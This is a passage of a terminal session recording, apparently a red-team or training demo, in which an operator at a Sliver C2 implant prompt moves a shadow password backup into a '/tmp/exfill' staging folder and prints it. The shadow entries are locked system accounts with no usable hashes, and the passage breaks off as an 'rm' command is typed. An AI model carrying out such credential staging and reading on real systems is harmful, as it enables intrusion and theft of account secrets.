"\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[53D\u001b[26C\u001b[133D\u001b[53C\u001b[?25h"] +[38.472862, "o", "\u001b[?25l"] +[38.477365, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[38.485551, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[38.486867, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[52D\u001b[26C\u001b[133D\u001b[52C\u001b[?25h"] +[38.612072, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[38.617675, "o", "\u001b[6n"] +[38.625044, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[51D\u001b[26C\u001b[133D\u001b[51C"] +[38.62529, "o", "\u001b[?25h"] +[38.758816, "o", "\u001b[?25l\u001b[133D"] +[38.761245, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[38.767168, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[50D\u001b[26C\u001b[133D\u001b[50C\u001b[?25h"] +[38.825485, "o", "\u001b[?25l\u001b[133D"] +[38.827085, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[38.831966, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exf\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[38.832869, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[51D\u001b[26C\u001b[133D\u001b[51C\u001b[?25h"] +[39.043514, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[39.05357, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[39.054544, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[52D\u001b[26C\u001b[133D\u001b[52C\u001b[?25h"] +[39.095225, "o", "\u001b[?25l\u001b[133D"] +[39.098084, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[39.103815, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[53D\u001b[26C\u001b[133D\u001b[53C\u001b[?25h"] +[39.285161, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[39.292636, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[54D\u001b[26C\u001b[133D\u001b[54C\u001b[?25h"] +[39.579011, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[39.591282, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[39.595084, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[55D\u001b[26C\u001b[133D\u001b[55C\u001b[?25h"] +[39.979969, "o", "\u001b[?25l\u001b[133D"] +[39.98123, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[39.982869, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/s\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[56D\u001b[26C\u001b[133D\u001b[56C\u001b[?25h"] +[40.082003, "o", "\u001b[?25l\u001b[133D"] +[40.083, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[40.086276, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/sh\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[57D\u001b[26C\u001b[133D\u001b[57C\u001b[?25h"] +[40.162778, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[40.163973, "o", "\u001b[6n"] +[40.166682, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/sha\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[58D\u001b[26C"] +[40.167547, "o", "\u001b[133D\u001b[58C\u001b[?25h"] +[40.258095, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[40.259161, "o", "\u001b[6n"] +[40.263009, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/shad\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[59D\u001b[26C\u001b[133D\u001b[59C\u001b[?25h"] +[40.336117, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[40.336503, "o", "\u001b[6n"] +[40.340184, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/shado\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[40.340522, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[60D\u001b[26C\u001b[133D\u001b[60C\u001b[?25h"] +[40.470924, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[40.476087, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/shadow\u001b[0m\u001b[0K\u001b[49m\r"] +[40.483373, "o", "\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[61D\u001b[26C\u001b[133D\u001b[61C\u001b[?25h"] +[40.777172, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[40.785904, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/shadow_\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[40.786195, "o", "\u001b[133D\u001b[1A\u001b[62D\u001b[26C\u001b[133D\u001b[62C\u001b[?25h"] +[41.092171, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[41.102119, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/shadow_b\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[41.103505, "o", "\u001b[133D\u001b[1A\u001b[63D\u001b[26C\u001b[133D\u001b[63C\u001b[?25h"] +[41.139323, "o", "\u001b[?25l\u001b[133D"] +[41.141253, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[41.147391, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/shadow_ba\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[41.147639, "o", "\u001b[133D\u001b[1A\u001b[64D\u001b[26C\u001b[133D\u001b[64C\u001b[?25h"] +[41.232342, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[41.236419, "o", "\u001b[6n"] +[41.242607, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/shadow_bac\u001b[0m\u001b[0K\u001b[49m\r"] +[41.243455, "o", "\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[65D\u001b[26C\u001b[133D\u001b[65C\u001b[?25h"] +[41.330534, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[41.332381, "o", "\u001b[6n"] +[41.33479, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/shadow_back\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[41.335394, "o", "\u001b[1A\u001b[66D\u001b[26C\u001b[133D\u001b[66C\u001b[?25h"] +[41.57333, "o", "\u001b[?25l"] +[41.576837, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[41.584022, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/shadow_backu\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[67D\u001b[26C\u001b[133D\u001b[67C\u001b[?25h"] +[41.750013, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[41.758291, "o", "\u001b[6n"] +[41.765596, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exfill/shadow_backup\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[41.766062, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[68D\u001b[26C\u001b[133D\u001b[68C\u001b[?25h"] +[42.74357, "o", "\u001b[68D\u001b[26C"] +[42.745566, "o", "\u001b[6n"] +[42.749571, "o", "\u001b[133D\u001b[68C\u001b[0J"] +[42.751479, "o", "\u001b[133D\r\r\n\u001b[0 q\r\n"] +[42.842923, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mshadow_backup > /tmp/exfill/shadow_backup\r\n\r\n"] +[42.85322, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[42.853339, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[42.853376, "o", "\u001b[6n"] +[42.855296, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[26D\u001b[26C\u001b[133D\u001b[26C\u001b[?25h"] +[44.732641, "o", "\u001b[?25l"] +[44.739476, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[44.756104, "o", "c\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[27D\u001b[26C\u001b[133D\u001b[27C\u001b[?25h"] +[44.9115, "o", "\u001b[?25l\u001b[133D"] +[44.912724, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[44.917745, "o", "ca\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[28D\u001b[26C\u001b[133D\u001b[28C\u001b[?25h"] +[45.072046, "o", "\u001b[?25l"] +[45.078879, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[45.090026, "o", "\u001b[1m\u001b[32mcat\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[45.091567, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[29D\u001b[26C\u001b[133D\u001b[29C\u001b[?25h"] +[45.265417, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[45.277864, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[45.278093, "o", "\u001b[1A\u001b[30D\u001b[26C\u001b[133D\u001b[30C\u001b[?25h"] +[46.318561, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[46.330092, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[31D\u001b[26C\u001b[133D\u001b[31C\u001b[?25h"] +[46.61635, "o", "\u001b[?25l"] +[46.617085, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[46.628005, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/t\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[46.628616, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[32D\u001b[26C\u001b[133D\u001b[32C\u001b[?25h"] +[46.708941, "o", "\u001b[?25l\u001b[133D"] +[46.710932, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[46.716622, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tm\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[33D\u001b[26C\u001b[133D\u001b[33C\u001b[?25h"] +[46.803599, "o", "\u001b[?25l"] +[46.805099, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[46.812464, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[46.814584, "o", "\u001b[133D\u001b[1A\u001b[34D\u001b[26C\u001b[133D\u001b[34C\u001b[?25h"] +[47.093701, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[47.099599, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[47.101722, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[35D\u001b[26C\u001b[133D\u001b[35C\u001b[?25h"] +[47.240519, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[47.242173, "o", "\u001b[6n"] +[47.24705, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[47.248127, "o", "\u001b[133D\u001b[1A\u001b[36D\u001b[26C\u001b[133D\u001b[36C\u001b[?25h"] +[47.435494, "o", "\u001b[?25l"] +[47.437767, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[47.450495, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[37D\u001b[26C\u001b[133D\u001b[37C\u001b[?25h"] +[47.731035, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[47.741547, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exf\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[47.743115, "o", "\u001b[133D\u001b[1A\u001b[38D\u001b[26C\u001b[133D\u001b[38C\u001b[?25h"] +[47.869998, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[47.87498, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[47.876375, "o", "\u001b[133D\u001b[1A\u001b[39D\u001b[26C\u001b[133D\u001b[39C\u001b[?25h"] +[47.925902, "o", "\u001b[?25l"] +[47.929166, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[47.934184, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[47.934672, "o", "\u001b[1A\u001b[40D\u001b[26C\u001b[133D\u001b[40C\u001b[?25h"] +[48.102689, "o", "\u001b[?25l"] +[48.116547, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[48.121463, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[48.121953, "o", "\u001b[133D\u001b[1A\u001b[41D\u001b[26C\u001b[133D\u001b[41C\u001b[?25h"] +[48.546104, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[48.555915, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[42D\u001b[26C\u001b[133D\u001b[42C\u001b[?25h"] +[48.7765, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[48.78249, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/s\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[48.784186, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[43D\u001b[26C\u001b[133D\u001b[43C\u001b[?25h"] +[48.872687, "o", "\u001b[?25l\u001b[133D"] +[48.87301, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[48.875792, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/sh\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[44D\u001b[26C\u001b[133D\u001b[44C\u001b[?25h"] +[48.964134, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[48.96483, "o", "\u001b[6n"] +[48.969772, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/sha\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[48.970898, "o", "\u001b[133D\u001b[1A\u001b[45D\u001b[26C\u001b[133D\u001b[45C\u001b[?25h"] +[49.073899, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[49.081928, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/shad\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[49.083202, "o", "\u001b[1A\u001b[46D\u001b[26C\u001b[133D\u001b[46C\u001b[?25h"] +[49.15208, "o", "\u001b[?25l"] +[49.155533, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[49.160728, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/shado\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[49.161059, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[47D\u001b[26C\u001b[133D\u001b[47C\u001b[?25h"] +[49.308998, "o", "\u001b[?25l"] +[49.310158, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[49.312199, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/shadow\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[48D\u001b[26C\u001b[133D\u001b[48C\u001b[?25h"] +[49.644092, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[49.651504, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/shadow_\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[49.653884, "o", "\u001b[133D\u001b[1A\u001b[49D\u001b[26C\u001b[133D\u001b[49C\u001b[?25h"] +[50.164413, "o", "\u001b[?25l"] +[50.165926, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[50.169503, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/shadow_b\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[50.170954, "o", "\u001b[1A\u001b[50D\u001b[26C\u001b[133D\u001b[50C\u001b[?25h"] +[50.252651, "o", "\u001b[?25l\u001b[133D"] +[50.254874, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[50.26258, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/shadow_ba\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[51D\u001b[26C\u001b[133D\u001b[51C\u001b[?25h"] +[50.286364, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[50.287492, "o", "\u001b[6n"] +[50.290874, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/shadow_bac\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[50.291953, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[52D\u001b[26C\u001b[133D\u001b[52C\u001b[?25h"] +[50.423942, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[50.424882, "o", "\u001b[6n"] +[50.440395, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/shadow_back\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[50.442511, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[53D\u001b[26C\u001b[133D\u001b[53C\u001b[?25h"] +[50.654647, "o", "\u001b[?25l\u001b[133D"] +[50.655627, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[50.657449, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/shadow_backu\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[54D\u001b[26C\u001b[133D\u001b[54C\u001b[?25h"] +[50.886992, "o", "\u001b[?25l"] +[50.892802, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[50.900633, "o", "\u001b[1m\u001b[32mcat \u001b[39m\u001b[22m/tmp/exfill/shadow_backup\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[55D\u001b[26C\u001b[133D\u001b[55C\u001b[?25h"] +[51.205717, "o", "\u001b[55D\u001b[26C"] +[51.208926, "o", "\u001b[6n"] +[51.228582, "o", "\u001b[133D\u001b[55C\u001b[0J\u001b[133D\r\r\n\u001b[0 q\r\n"] +[51.319571, "o", "\r\u001b[2K"] +[51.322089, "o", "root:*:19472:0:99999:7:::\r\ndaemon:*:19472:0:99999:7:::\r\nbin:*:19472:0:99999:7:::\r\nsys:*:19472:0:99999:7:::\r\nsync:*:19472:0:99999:7:::\r\ngames:*:19472:0:99999:7:::\r\nman:*:19472:0:99999:7:::\r\nlp:*:19472:0:99999:7:::\r\nmail:*:19472:0:99999:7:::\r\nnews:*:19472:0:99999:7:::\r\nuucp:*:19472:0:99999:7:::\r\nproxy:*:19472:0:99999:7:::\r\nwww-data:*:19472:0:99999:7:::\r\nbackup:*:19472:0:99999:7:::\r\nlist:*:19472:0:99999:7:::\r\nirc:*:19472:0:99999:7:::\r\ngnats:*:19472:0:99999:7:::\r\nnobody:*:19472:0:99999:7:::\r\n_apt:*:19472:0:99999:7:::\r\n\r\n\r\n"] +[51.332505, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[51.332892, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[51.334645, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[51.335388, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[26D\u001b[26C\u001b[133D\u001b[26C\u001b[?25h"] +[53.195564, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[53.19894, "o", "\u001b[6n"] +[53.205974, "o", "r\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[53.207096, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[27D\u001b[26C\u001b[133D\u001b[27C\u001b[?25h"] +[53.67869, "o", "\u001b[?25l"] +[53.68055, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[53.684107, "o", "\u001b[1m\u001b[32mrm\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[28D\u001b[26C\u001b[133D\u001b[28C"] +[53.685155, "o", "\u001b[?25h"] +[53.843103, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[53.854517, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[53.858017, "o", "\u001b[1A\u001b[29D\u001b[26C\u001b[133D\u001b[29C\u001b[?25h"] +[54.352012, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] 